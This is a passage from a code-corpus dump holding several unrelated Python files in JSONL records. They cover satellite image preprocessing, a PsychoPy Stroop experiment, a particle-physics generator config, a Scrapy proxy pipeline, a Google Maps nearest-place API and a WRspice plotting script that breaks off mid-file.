array_of_angles[:, i] = np.full(1200, angles[i])\r\n return array_of_angles\r\n\r\n def ancillary_information_addition(self, whiteness=True,\r\n ratio_temperatures=True,\r\n averages=True):\r\n print('Adding extra datasets...')\r\n if averages:\r\n channels = self.channels.copy()\r\n for key in channels:\r\n data = self.data[key]\r\n avg = np.nanmean(data)\r\n average_ratio = np.full(data.shape, float(avg))\r\n self.data.update({str(key + '_average'): average_ratio})\r\n self.channels.append(str(key + '_average'))\r\n if whiteness:\r\n whiteness_test = self.whiteness(self.data)\r\n self.channels.append('whiteness')\r\n self.data.update({'whiteness': whiteness_test})\r\n if averages:\r\n avg = np.nanmean(whiteness_test)\r\n average_whiteness = np.full(whiteness_test.shape, float(avg))\r\n self.data.update({'whiteness_average': average_whiteness})\r\n self.channels.append('whiteness_average')\r\n if ratio_temperatures:\r\n ratio_dictionary = self.temp_ratio(self.data)\r\n for key in ratio_dictionary.keys():\r\n self.channels.append(key)\r\n data = ratio_dictionary[key]\r\n self.data.update({key: data})\r\n if averages:\r\n avg = np.nanmean(data)\r\n average_ratio = np.full(data.shape, float(avg))\r\n self.data.update({key+'_average': average_ratio})\r\n self.channels.append(key+'_average')\r\n print('Done')\r\n\r\n def create_random_data(self, fraction_for_training=0.5, for_nn=True):\r\n '''Using the input channels as references, generates arrays of\r\n normally distributerd data with a mean of the global mean\r\n the input channel and a standard deviation of the input\r\n channel's standard deviation.\r\n NB// If the data has not been flattened, will return two\r\n arrays of input and mask that are the shape of the\r\n bayesian mask.\r\n\r\n :param fraction_for_training: float type. The fraction of data\r\n that should be used for training.\r\n :return\r\n '''\r\n print('Generating randomised data...')\r\n start = t.time()\r\n random_data = {}\r\n for channel in self.channels and self.geometry:\r\n og_data = self.data[channel]\r\n mean = np.nanmean(og_data)\r\n std = np.nanstd(og_data)\r\n norm_data = np.random.normal(loc=mean,\r\n scale=2.*std,\r\n size=og_data.shape)\r\n key = channel + '_randomised'\r\n random_data.update({key: norm_data})\r\n rand_mask = np.random.randint(low=0,\r\n high=2,\r\n size=self.cloud_mask['bayes_in'].shape)\r\n random_data.update({'mask_randomised': rand_mask})\r\n final = []\r\n for coord in np.ndindex(rand_mask.shape):\r\n input_vector = np.zeros(len(random_data))\r\n p = 0\r\n for key in random_data.keys():\r\n input_vector[p] = random_data[key][coord]\r\n p += 1\r\n final.append(input_vector)\r\n cutoff = int(len(final) * fraction_for_training)\r\n final = np.asarray(final)\r\n data, mask = final[:,:-1], final[:,-1].astype(int)\r\n train_in, test_in = data[:-cutoff], data[-cutoff:]\r\n train_mask, test_mask = mask[:-cutoff], mask[-cutoff:]\r\n if for_nn:\r\n print('Time to create randomised data: ' + str(round((t.time() - start), 2)) + 's')\r\n return train_in, train_mask, test_in, test_mask\r\n print('Time to create randomised data: ' + str(round((t.time() - start), 2)) + 's')\r\n data = data.reshape(rand_mask.shape[0],\r\n rand_mask.shape[-1],\r\n len(random_data))\r\n mask = mask.reshape(rand_mask.shape[0],\r\n rand_mask.shape[-1],\r\n len(random_data))\r\n return data, mask\r\n\r\n def track_and_remove_NaNs(self, data):\r\n '''Takes an input array and tracks all the NaN values\r\n in a boolean array where True is where a NaN value is.\r\n Returns this boolean array along with the original\r\n array, but now flattened with all the NaNs removed.\r\n\r\n :param data: np.ndarray type. Input array to be tracked\r\n and corrected.\r\n :return:\r\n '''\r\n if len(data.shape) == 2:\r\n where_nans = np.isnan(data).any(axis=1)\r\n corrected_data = np.delete(data, np.where(where_nans), axis=0)\r\n return where_nans, corrected_data\r\n if len(data.shape) == 3:\r\n where_nans = np.isnan(data).any(axis=2)\r\n flattened = data.reshape((data.shape[0] * data.shape[1]), data.shape[-1])\r\n flat_where_nans = np.isnan(flattened).any(axis=1)\r\n corrected_data = np.delete(flattened, np.where(flat_where_nans), axis=0)\r\n return where_nans, corrected_data\r\n\r\n def create_synthetic_data(self, fraction_for_training=0.5, shuffle=True, for_nn=True):\r\n \"\"\"Uses all of the data from all parameters to create training and\r\n validation sets. The training data is\r\n\r\n :param fraction_for_training: float type. The fraction of data\r\n that should be used for training.\r\n :param shuffle: bool type. If True, randomly shuffles the data.\r\n :return:\r\n \"\"\"\r\n print('Generating synthetic data...')\r\n start = t.time()\r\n input_vector_length = len(self.channels)+len(self.geometry)\r\n complete_data = []\r\n for coord in np.ndindex(self.cloud_mask['bayes_in'].shape):\r\n input_vector = np.zeros(input_vector_length+1)\r\n p = 0\r\n for key in self.data.keys():\r\n input_vector[p] = self.data[key][coord]\r\n p += 1\r\n if (input_vector[0] >= 39.23 and input_vector[1] >= 39.69\r\n and input_vector[2] >= 273.15 and input_vector[3] >= 273.15):\r\n input_vector[-1] = 1\r\n complete_data.append(input_vector)\r\n cutoff = int(len(complete_data) * fraction_for_training)\r\n complete_data = np.asarray(complete_data)\r\n if shuffle:\r\n np.random.shuffle(complete_data)\r\n if for_nn:\r\n corrected_data = self.track_and_remove_NaNs(complete_data)\r\n data, mask = corrected_data[-1][:, :-1], corrected_data[-1][:, -1].astype(int)\r\n train_in, test_in = data[:-cutoff], data[-cutoff:]\r\n train_mask, test_mask = mask[:-cutoff], mask[-cutoff:]\r\n print('Time to create synthetic data: ' + str(round((t.time() - start), 2)) + 's')\r\n return train_in, train_mask, test_in, test_mask\r\n complete_data = complete_data.reshape(self.cloud_mask['bayes_in'].shape[0],\r\n self.cloud_mask['bayes_in'].shape[1],\r\n (input_vector_length + 1))\r\n data, mask = complete_data[:, :-1], complete_data[:, -1].astype(int)\r\n train_in, test_in = data[:-cutoff], data[-cutoff:]\r\n train_mask, test_mask = mask[:-cutoff], mask[-cutoff:]\r\n print('Time to create synthetic data: ' + str(round((t.time() - start), 2)) + 's')\r\n return train_in, train_mask, test_in, test_mask\r\n\r\n def create_training_data(self, fraction_for_training=0.5, shuffle=True, for_nn=True):\r\n \"\"\"Uses all of the data from all parameters to create training and\r\n validation sets.\r\n\r\n :param fraction_for_training: float type. The fraction of data\r\n that should be used for training.\r\n :param shuffle: bool type. If True, randomly shuffles the data.\r\n :return:\r\n \"\"\"\r\n print('Generating training data...')\r\n start = t.time()\r\n input_vector_length = len(self.channels)+len(self.geometry)\r\n complete_data = []\r\n for coord in np.ndindex(self.cloud_mask['bayes_in'].shape):\r\n input_vector = np.zeros(input_vector_length + 1)\r\n p = 0\r\n for key in self.data.keys():\r\n input_vector[p] = self.data[key][coord]\r\n p += 1\r\n input_vector[-1] = self.cloud_mask['bayes_in'][coord]\r\n complete_data.append(input_vector)\r\n cutoff = int(len(complete_data) * fraction_for_training)\r\n complete_data = np.asarray(complete_data)\r\n if shuffle:\r\n np.random.shuffle(complete_data)\r\n if for_nn:\r\n corrected_data = self.track_and_remove_NaNs(complete_data)\r\n data, mask = corrected_data[-1][:, :-1], corrected_data[-1][:, -1].astype(int)\r\n train_in, test_in = data[:cutoff], data[cutoff:]\r\n train_mask, test_mask = mask[:cutoff], mask[cutoff:]\r\n print('Time to create training data: ' + str(round((t.time() - start), 2)) + 's')\r\n return train_in, train_mask, test_in, test_mask\r\n complete_data = complete_data.reshape(self.cloud_mask['bayes_in'].shape[0],\r\n self.cloud_mask['bayes_in'].shape[1],\r\n (input_vector_length+1))\r\n data, mask = complete_data[:, :-1], complete_data[:, -1].astype(int)\r\n train_in, test_in = data[:cutoff], data[cutoff:]\r\n train_mask, test_mask = mask[:cutoff], mask[cutoff:]\r\n print('Time to create training data: ' + str(round((t.time() - start), 2)) + 's')\r\n return train_in, train_mask, test_in, test_mask\r\n\r\n def prep_image(self, filepath, save_data=False):\r\n '''Prepares an image for classification by the ANN. As the data is\r\n compacted and flattened by removing NaNs,\r\n\r\n :param filenames:\r\n :param filepath:\r\n :return:\r\n '''\r\n print('Preparing image for classification...')\r\n start = t.time()\r\n input_vector_length = len(self.channels)+len(self.geometry)\r\n complete_data = []\r\n for coord in np.ndindex(self.cloud_mask['bayes_in'].shape):\r\n input_vector = np.zeros(input_vector_length)\r\n p = 0\r\n for key in self.data.keys():\r\n input_vector[p] = self.data[key][coord]\r\n p += 1\r\n complete_data.append(input_vector)\r\n complete_data = np.asarray(complete_data)\r\n corrected_data = self.track_and_remove_NaNs(complete_data)\r\n where_nans, flattened_data = corrected_data\r\n if save_data:\r\n datasets = [where_nans, flattened_data]\r\n filenames = ['where_nans', 'prepared_data']\r\n self.save_data(filenames=filenames,\r\n filepath=filepath,\r\n datasets=datasets)\r\n print('Time to prepare and save image data: ' +\r\n str(round((t.time() - start), 2)) + 's')\r\n else:\r\n print('Time to prepare image data: '\r\n + str(round((t.time() - start), 2)) + 's')\r\n return where_nans, flattened_data\r\n\r\n def save_data(self, filenames, filepath, datasets):\r\n '''Saves the data as numpy files. Please give the filenames\r\n and the datasets in the right order, i.e. 1st filename\r\n corresponds to the 1st dataset, etc.\r\n\r\n :param filenames: list type\r\n :param filepath: str type\r\n :param datasets: list type\r\n :return:\r\n '''\r\n if len(filenames) != len(datasets):\r\n raise Exception('Please give the same number of filenames as datasets')\r\n for i in range(len(datasets)):\r\n np.save(join(filepath, filenames[i]), datasets[i])\r\n\r\n def save_images(self, path):\r\n for parameter in self.parameters:\r\n data = self.load_data(parameter)[0]\r\n img = XRImage(data)\r\n img.stretch()\r\n filepath = join( path, str(parameter + '.png'))\r\n img.save(filepath)\r\n","sub_path":"library/datahandling/image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":23537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"352630158","text":"# -*- coding: utf-8 -*-\nfrom psychopy import event, core, data, gui, visual\nfrom fileHandling import *\nimport pdb\nimport numpy as np\n\n\nclass Experiment:\n def __init__(self, win_color):\n self.stimuli_positions = [[-.6,-0.4],[-.3, -0.4], [0, -0.4], [0.3, -0.4],[0.6,-0.4],\n [-.6,-0.2],[-.3, -0.2], [0, -0.2], [0.3, -0.2],[0.6,-0.2],\n [-.6,0],[-.3, 0], [0, 0], [0.3, 0],[0.6,0],\n [-.6,0.2],[-.3, 0.2], [0, 0.2], [0.3, 0.2],[0.6,0.2],\n [-.6,0.4],[-.3, 0.4], [0, 0.4], [0.3, 0.4],[0.6,0.4],]\n self.win_color = win_color\n\n def create_window(self, color=(1, 1, 1)):\n # type: (object, object) -> object\n color = self.win_color\n win = visual.Window(monitor=\"testMonitor\",\n color=color, fullscr=True)\n return win\n\n def settings(self):\n experiment_info = {'Subid': '', 'Age': '', 'Experiment Version': 0.1,\n 'Sex': ['Male', 'Female', 'Other'],\n 'Language': ['French', 'English'], u'date':\n data.getDateStr(format=\"%Y-%m-%d_%H:%M\")}\n\n info_dialog = gui.DlgFromDict(title='Stroop task', dictionary=experiment_info,\n fixed=['Experiment Version'])\n experiment_info[u'DataFile'] = u'Data' + os.path.sep + u'stroop_mg.csv'\n\n if info_dialog.OK:\n return experiment_info\n else:\n core.quit()\n return 'Cancelled'\n \n def write_to_file(self,rt1,rt2):\n myCsvRow = '%s;%s;%s;%s;%s;%s;%s\\n' % (settings['Age'],settings['Sex'],rt1,rt2,settings['Language'],settings['date'],settings['Subid'])\n with open(settings[u'DataFile'],'a') as fd:\n fd.write(myCsvRow)\n \n \n def create_text_stimuli(self, text=None, pos=[0.0, 0.0], name='', color='Black'):\n '''Creates a text stimulus,\n '''\n\n text_stimuli = visual.TextStim(win=window, ori=0, name=name,\n text=text, font=u'Arial',\n pos=pos,\n color=color, colorSpace=u'rgb')\n return text_stimuli\n\n def create_trials(self, trial_file, randomization='random'):\n '''Doc string'''\n data_types = ['RT', 'Sub_id', 'Sex']\n with open(trial_file, 'r') as stimfile:\n _stims = csv.DictReader(stimfile)\n trials = data.TrialHandler(list(_stims), 1,\n method=\"random\")\n\n [trials.data.addDataType(data_type) for data_type in data_types]\n\n return trials\n\n def present_stimuli(self, color, text, position, stim):\n _stimulus = stim\n color = color\n position = position\n if settings['Language'] == \"Swedish\":\n text = swedish_task(text)\n else:\n text = text\n _stimulus.pos = position\n _stimulus.setColor(color)\n _stimulus.setText(text)\n return _stimulus\n\n def running_experiment(self, wordlist, testtype):\n _wordlist = wordlist\n testtype = testtype\n timer = core.Clock()\n stimuli = [self.create_text_stimuli(window) for _ in range(26)]\n\n #for trial in _trials:\n # Fixation cross\n fixation = self.present_stimuli('Black', '+', self.stimuli_positions[12],\n stimuli[25])\n fixation.draw()\n window.flip()\n core.wait(1.)\n timer.reset()\n i=0\n for word in wordlist:\n #for i in range(len(self.stimuli_positions)):\n target = self.present_stimuli(word['colour'], word['word'],self.stimuli_positions[i], stimuli[i])\n i+=1\n target.draw()\n # Target word\n #target = self.present_stimuli(trial['colour'], trial['stimulus'],\n # self.stimuli_positions[2], stimuli[0])\n #target.draw()\n # alt1\n #alt1 = self.present_stimuli('Black', trial['alt1'],\n # self.stimuli_positions[0], stimuli[1])\n #alt1.draw()\n # alt2\n #alt2 = self.present_stimuli('Black', trial['alt2'],\n # self.stimuli_positions[1], stimuli[2])\n #alt2.draw()\n window.flip()\n\n keys = event.waitKeys(keyList=['space', 'enter'])\n resp_time = timer.getTime()\n #if testtype == 'practice':\n # if keys[0] != trial['correctresponse']:\n # instruction_stimuli['incorrect'].draw()\n\n # else:\n # instruction_stimuli['right'].draw()\n\n # window.flip()\n # core.wait(2)\n\n #if testtype == 'Test1':\n #if keys[0] == trial['correctresponse']:\n # trial['Accuracy'] = 1\n #else:\n # trial['Accuracy'] = 0\n\n \n\n event.clearEvents()\n return resp_time\n\ndef create_instructions_dict(instr):\n start_n_end = [w for w in instr.split() if w.endswith('START') or w.endswith('END')]\n keys = {}\n\n for word in start_n_end:\n key = re.split(\"[END, START]\", word)[0]\n\n if key not in keys.keys():\n keys[key] = []\n\n if word.startswith(key):\n keys[key].append(word)\n return keys\n\n\ndef create_instructions(input, START, END):\n instruction_text = parse_instructions(input, START, END)\n print(instruction_text)\n text_stimuli = visual.TextStim(window, text=instruction_text, wrapWidth=1.2,\n alignHoriz='center', color=\"Black\",\n alignVert='center', height=0.06)\n\n return text_stimuli\n\n\ndef display_instructions(start_instruction='',rt=None):\n # Display instructions\n\n if start_instruction == 'Practice':\n instruction_stimuli['instructions'].pos = (0.0, 0.5)\n instruction_stimuli['instructions'].draw()\n\n positions = [[-.2, 0], [.2, 0], [0, 0]]\n examples = [experiment.create_text_stimuli() for pos in positions]\n example_words = ['green', 'blue', 'green']\n if settings['Language'] == 'Swedish':\n example_words = [swedish_task(word) for word in example_words]\n\n for i, pos in enumerate(positions):\n examples[i].pos = pos\n\n if i == 0:\n examples[0].setText(example_words[i])\n\n elif i == 1:\n examples[1].setText(example_words[i])\n\n elif i == 2:\n examples[2].setColor('Green')\n examples[2].setText(example_words[i])\n\n [example.draw() for example in examples]\n\n instruction_stimuli['practice'].pos = (0.0, -0.5)\n instruction_stimuli['practice'].draw()\n\n elif start_instruction == 'Test1':\n instruction_stimuli['instructions1a'].pos = (0.0, 0.3)\n instruction_stimuli['instructions1a'].draw()\n \n positions = [[-.2, 0], [0, 0], [.2, 0]]\n examples = [experiment.create_text_stimuli() for pos in positions]\n example_words = ['blue', 'green', 'yellow'] # \"Blue, Red, Yellow\"\n if settings['Language'] == 'French':\n example_words = ['bleu', 'vert', 'jaune']\n\n for i, pos in enumerate(positions):\n examples[i].pos = pos\n\n if i == 0:\n examples[0].setColor('Blue')\n examples[0].setText(example_words[i])\n\n elif i == 1:\n examples[1].setColor('Red')\n examples[1].setText(example_words[i])\n\n elif i == 2:\n examples[2].setColor('Green')\n examples[2].setText(example_words[i])\n\n [example.draw() for example in examples]\n \n instruction_stimuli['instructions1b'].pos = (0.0, -0.4)\n instruction_stimuli['instructions1b'].draw()\n #instruction_stimuli['test'].draw()\n \n elif start_instruction == 'Test2':\n instruction_stimuli['instructions2a'].pos = (0.0, 0.3)\n instruction_stimuli['instructions2a'].draw()\n \n positions = [0, 0]\n reactionTime = [experiment.create_text_stimuli() for pos in positions]\n #example_words = ['blue', 'green', 'yellow'] # \"Blue, Red, Yellow\"\n \n #if settings['Language'] == 'Swedish':\n # example_words = [swedish_task(word) for word in example_words]\n reactionTime[0].pos = positions\n reactionTime[0].setColor('Black')\n reactionTime[0].setText(np.round(rt,3))\n reactionTime[0].draw()\n \n instruction_stimuli['instructions2b'].pos = (0.0, -0.4)\n instruction_stimuli['instructions2b'].draw()\n #instruction_stimuli['test'].draw()\n \n elif start_instruction == 'End':\n instruction_stimuli['done1'].pos = (0.0, 0.3)\n instruction_stimuli['done1'].draw()\n \n positions = [0, 0]\n reactionTime = [experiment.create_text_stimuli() for pos in positions]\n #example_words = ['blue', 'green', 'yellow'] # \"Blue, Red, Yellow\"\n \n #if settings['Language'] == 'Swedish':\n # example_words = [swedish_task(word) for word in example_words]\n reactionTime[0].pos = positions\n reactionTime[0].setColor('Black')\n reactionTime[0].setText(np.round(rt,3))\n reactionTime[0].draw()\n \n instruction_stimuli['done2'].pos = (0.0, -0.4)\n instruction_stimuli['done2'].draw()\n #instruction_stimuli['test'].draw()\n #instruction_stimuli['done'].draw()\n\n window.flip()\n event.waitKeys(keyList=['space'])\n event.clearEvents()\n\n\ndef swedish_task(word):\n swedish = '+'\n if word == \"blue\":\n swedish = u\"blå\"\n\n elif word == \"red\":\n swedish = u\"röd\"\n\n elif word == \"green\":\n swedish = u\"grön\"\n\n elif word == \"yellow\":\n swedish = \"gul\"\n\n return swedish\n\n\nif __name__ == \"__main__\":\n experiment = Experiment(win_color=\"White\")\n settings = experiment.settings()\n language = settings['Language']\n instructions = read_instructions_file(\"INSTRUCTIONS\", language, language + \"End\")\n instructions_dict = create_instructions_dict(instructions)\n instruction_stimuli = {}\n\n window = experiment.create_window(color=(0, 0, 0))\n\n for instruction, (START, END) in instructions_dict.items():\n instruction_stimuli[instruction] = create_instructions(instructions, START, END)\n # We don't want the mouse to show:\n event.Mouse(visible=False)\n \n # Practice Trials\n #display_instructions(start_instruction='Practice')\n\n #practice = experiment.create_trials('practice_list.csv')\n #experiment.running_experiment(practice, testtype='practice')\n # Test trials\n display_instructions(start_instruction='Test1')\n if settings['Language']=='French':\n trials1 = experiment.create_trials('stimuli1_list_fr.csv')\n elif settings['Language']=='English':\n trials1 = experiment.create_trials('stimuli1_list_eng.csv')\n #pdb.set_trace()\n RT1 = experiment.running_experiment(trials1, testtype='test1')\n print(RT1)\n display_instructions(start_instruction='Test2',rt=RT1)\n if settings['Language']=='French':\n trials2 = experiment.create_trials('stimuli2_list_fr.csv')\n elif settings['Language']=='English':\n trials2 = experiment.create_trials('stimuli2_list_eng.csv')\n #pdb.set_trace()\n RT2 = experiment.running_experiment(trials2, testtype='test2')\n print(RT2)\n experiment.write_to_file(RT1,RT2)\n # End experiment but first we display some instructions\n display_instructions(start_instruction='End',rt=RT2)\n window.close()\n","sub_path":"stroopy_MG.py","file_name":"stroopy_MG.py","file_ext":"py","file_size_in_byte":11834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"114196373","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"MATCHINGZMUMU\")\n#keep the logging output to a nice level\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\n\n# MadGraph Interface\nprocess.load(\"GeneratorInterface.MadGraphInterface.MadGraphSourceDefault_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(-1)\n)\nprocess.RandomNumberGeneratorService = cms.Service(\"RandomNumberGeneratorService\",\n sourceSeed = cms.untracked.uint32(824177121)\n)\n\nprocess.out = cms.OutputModule(\"PoolOutputModule\",\n fileName = cms.untracked.string('MGtest.root')\n)\n\nprocess.p = cms.EndPath(process.out)\nprocess.MadGraphSource.fileNames = ['file:Zmumujets_xqcut20_qcut30_50K.lhe'] # rfcp /castor/cern.ch/user/d/dkcira/MadGraph/Samples/Zmumujets_xqcut20_qcut30_50K.lhe .\n# process.MadGraphSource.produceEventTreeFile = True # used for checking matching but should be turned off in production, it messes up the status of particles\nprocess.MadGraphSource.MEMAIN_etaclmax = 5.\nprocess.MadGraphSource.MEMAIN_qcut = 30.\nprocess.MadGraphSource.MEMAIN_iexcfile = 0 # only set to 1 if need to perform exclusive matching\nprocess.MadGraphSource.PythiaParameters = cms.PSet(\n parameterSets = cms.vstring('pythiaMatching'),\n pythiaMatching = cms.vstring('PMAS(5,1)=4.4 ! b quarks mass', \n 'PMAS(6,1)=174.2! t quarks mass', \n 'MSTJ(1)=1 !...Fragmentation/hadronization on or off', \n 'MSTJ(11)=3 ! Choice of the fragmentation function', \n 'MSTJ(22)=2 ! Decay those unstable particles', \n 'PARJ(71)=10. ! for which ctau 10 mm', \n 'MSTP(2)=1 ! which order running alphaS', \n 'MSTP(33)=0 ! no K factors in hard cross sections', \n 'MSTP(51)=7 ! structure function chosen', \n 'MSTP(61)=1 ! Parton showering on or off', \n 'MSTP(71)=1 !', \n 'MSTP(81)=0 ! multiple parton interactions 1 is Pythia default', \n 'MSTP(82)=0 ! Defines the multi-parton model', \n 'MSTP(143)=1 ! MUST BE 1 FOR THE MATCHING ROUTINE TO RUN!!!!', \n 'MSTU(21)=1 ! Check on possible errors during program execution', \n 'PARP(82)=1.9 ! pt cutoff for multiparton interactions', \n 'PARP(89)=1000. ! sqrts for which PARP82 is set', \n 'PARP(83)=0.5 ! Multiple interactions: matter distrbn parameter', \n 'PARP(84)=0.4 ! Multiple interactions: matter distribution parameter', \n 'PARP(90)=0.16 ! Multiple interactions: rescaling power', \n 'PARP(67)=1. ! amount of initial-state radiation', \n 'PARP(85)=0.33 ! gluon prod. mechanism in MI', \n 'PARP(86)=0.66 ! gluon prod. mechanism in MI', \n 'PARP(87)=0.7 ! ', \n 'PARP(88)=0.5 ! ', \n 'PARP(91)=1.0 ! kt distribution', \n 'MSEL=0 ! User defined processes/Full user control')\n)\n\n\n","sub_path":"GeneratorInterface/MadGraphInterface/test/matchingZmumu_cfg.py","file_name":"matchingZmumu_cfg.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"87935448","text":"\"\"\"\n4.\tНайти сумму n элементов следующего ряда чисел: 1 -0.5 0.25 -0.125 ...\nКоличество элементов (n) вводится с клавиатуры.\n\nПример:\nВведите количество элементов: 3\nКоличество элементов: 3, их сумма: 0.75\n\nПодсказка:\nКаждый очередной элемент в 2 раза меньше предыдущего и имеет противоположный знак\n\nРешите через рекурсию. Решение через цикл не принимается.\nДля оценки Отлично в этом блоке необходимо выполнить 5 заданий из 7\n\"\"\"\n\n\ndef int_input(input_str) -> int:\n num = ''\n while num == '':\n try:\n num = input(input_str + '\\n')\n num = int(num)\n except ValueError:\n print('введено не число')\n return num\n\n\ndef sum_of_row(iterator, el=1.0):\n return el if iterator == 0 else el + sum_of_row(iterator - 1, el * -0.5)\n\n\nif __name__ == '__main__':\n n = int_input('введите число')\n print(f'сумма: {sum_of_row(n-1)}')\n","sub_path":"Урок 2. Практическое задание/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"571310965","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport datetime\nfrom pymongo import *\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nclass IpProxyPipeline(object):\n\n mongoClient = None\n\n def __init__(self,host,port):\n logging.debug(\"Open Mongo %s:%d\" % (host,port))\n self.mongoClient= MongoClient(host,port)\n\n def process_item(self, item, spider):\n db = self.mongoClient[\"ip_proxy\"][\"nature_proxy\"]\n item[\"last_update\"] = datetime.datetime.now()\n logging.debug(\"insert One\")\n db.update_one({\"update_at\": item[\"last_update\"]}, {\"$set\": dict(item)}, upsert=True)\n\n # return item\n\n def close_spider(self, spider):\n logging.debug(\"Close Mongo\")\n self.mongoClient.close()\n\n\n @classmethod\n def from_crawler(cls, crawler):\n settings = crawler.settings\n\n logging.debug(\"Connect Mongo\")\n\n return cls(settings[\"MONGO_HOST\"], settings[\"MONGO_PORT\"])\n","sub_path":"codes/ip_proxy/ip_proxy/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"138160257","text":"import requests\n\nimport json\nimport os\n\n\nresponse = requests.get(\"https://www.tui.ru/api/office/cities/\")\njson_list=[]\nfor city in response.json():\n ofice_response= requests.get(\"https://www.tui.ru/api/office/list/?cityId={}\".format(city['cityId']))\n for ofice in ofice_response.json():\n workdays=ofice['hoursOfOperation']['workdays']\n saturday=ofice['hoursOfOperation']['saturday']\n sunday=ofice['hoursOfOperation']['sunday']\n\n weekend = 'cб {}-{} вс {} - {}'.format(saturday['start'][:-3], saturday['end'][:-3], sunday['start'][:-3], sunday['end'][:-3])\n hours=['пн-пт {}-{}'.format(workdays['start'][:-3], workdays['end'][:-3]),\n weekend\n ]\n json_dict={\n 'adress': ofice['address'],\n 'latlon' : [ofice['latitude'], ofice['longitude'] ],\n \"name\": ofice['name'],\n \"phones\": [ phone['phone'] for phone in ofice['phones']],\n \"working_hours\": hours\n }\n json_list.append(json_dict)\n\nget_path = os.path.dirname(__file__)\npath = os.path.join(get_path, 'json2.json',)\nwith open(path, 'w') as wf:\n json.dump(json_list, wf, ensure_ascii=False, indent=4)\n\n\n\n\n\n\n\n\n\n# response = requests.get(\"https://www.tui.ru/api/office/cities/\")\n#\n# print(response.text)\n# print(len(response.text))","sub_path":"script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"387857228","text":"import json\nimport falcon\nimport googlemaps\nfrom wsgiref import simple_server\nfrom math import sin, cos, sqrt, atan2, radians\n\n# Create Falcon API instance\napi = falcon.API()\n\nclass GasStation(object):\n\n def on_get(self, req, resp):\n # Insert personal API key\n gmaps = googlemaps.Client(key='Your API key here')\n input = req.params\n\n # Read parameters provided in a link to the server\n try:\n\n # Retrieving Geolocation from link address\n lat = float(input['lat'])\n lng = float(input['lng'])\n mylocation = {'lat': lat, 'lng': lng,}\n\n # Retrieving destination from link address\n if input['destination'] == 'gas_station':\n output = Distance().find_address(gmaps, mylocation, \"gas station\")\n elif input['destination'] == 'starbucks':\n output = Distance().find_address(gmaps, mylocation, \"starbucks\")\n elif input['destination'] == 'dunkin':\n output = Distance().find_address(gmaps, mylocation, \"dunkin donats\")\n elif req.content_length == 0:\n raise falcon.HTTPBadRequest(\"Incorrect parameters\",\n \"Provide correct parameters\")\n except:\n raise falcon.HTTPBadRequest( \"Incorrect parameters\",\n \"Provide correct parameters\")\n\n\n # Get provided parameters\n resp.body = json.dumps(output)\n\n resp.status = falcon.HTTP_200\n\n def on_post(self, req, resp):\n\n output = {'request': 'Incorrect'}\n\n resp.body = json.dumps(output)\n\n resp.status = falcon.HTTP_200\n\n\n# Approximate radius of earth in km\nR = 6373.0\nMILES_IN_KM: float = 0.621371\n\nclass Distance(object):\n\n \"\"\" Input: Dict with geolocation point\n Output: Distance between two points \"\"\"\n def find_distance(self, from_, to_):\n\n # Retrieve values from dictionary to variables\n lat1 = from_['lat']\n lon1 = from_['lng']\n lat2 = to_['lat']\n lon2 = to_['lng']\n\n # Calculate distance using geolocation of two points\n dlon = radians(lon2 - lon1)\n dlat = radians(lat2 - lat1)\n\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * atan2(sqrt(a), sqrt(1 - a))\n\n distance_ = (R * c) * MILES_IN_KM\n\n return round(distance_,2)\n\n \"\"\" Input: Dictance between two points\n Output: Address of destination \"\"\"\n def find_address(self, _gmaps, _from, _to):\n # Find closest building that you are looking for\n search_for_place = _gmaps.places(query=_to, location=_from, )\n results = search_for_place['results']\n\n # Find distance in miles between you and destination point\n dist = Distance()\n distance_ = dist.find_distance(_from, results[0]['geometry']['location'])\n\n # Data preparation for output as a JSON file\n output = {'address': results[0]['formatted_address'],\n 'distance': distance_,\n 'name': results[0]['name']}\n return output\n\n# Create an instance of gas station class in order to produce a response\ngas_station = GasStation()\n\napi.add_route('/key', gas_station)\n\nif __name__ == '__main__':\n httpd = simple_server.make_server('127.0.0.1', 8000, api)\n httpd.serve_forever()\n","sub_path":"maps_tokar/fullmain.py","file_name":"fullmain.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"470567957","text":"#%%\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport time\nfrom scipy.signal import find_peaks\nfrom scipy.optimize import curve_fit\n\n# from soen_sim import input_signal, synapse, dendrite, neuron\nfrom _plotting import plot_fq_peaks, plot_fq_peaks__dt_vs_bias, plot_wr_data__currents_and_voltages\nfrom _functions import read_wr_data, V_fq__fit, inter_fluxon_interval__fit, inter_fluxon_interval, inter_fluxon_interval__fit_2, inter_fluxon_interval__fit_3\nfrom util import physical_constants\np = physical_constants()\n\nplt.close('all')\n\n#%% load wr data\nread_wr = True\nif read_wr == True:\n directory = 'wrspice_data'\n file_name = 'dend_lin_ramp_Idrv18.0-30.0uA_Ldi0077.50nH_taudi00775ms_tsim43ns_dt00.1ps.dat'\n data_dict = read_wr_data(directory+'/'+file_name)\n data_dict['file_name'] = file_name\n\n#%% plot wr data\ndata_to_plot = ['L4#branch','L3#branch','v(3)','v(4)','v(5)']#'L0#branch','L1#branch','L2#branch',\nplot_save_string = 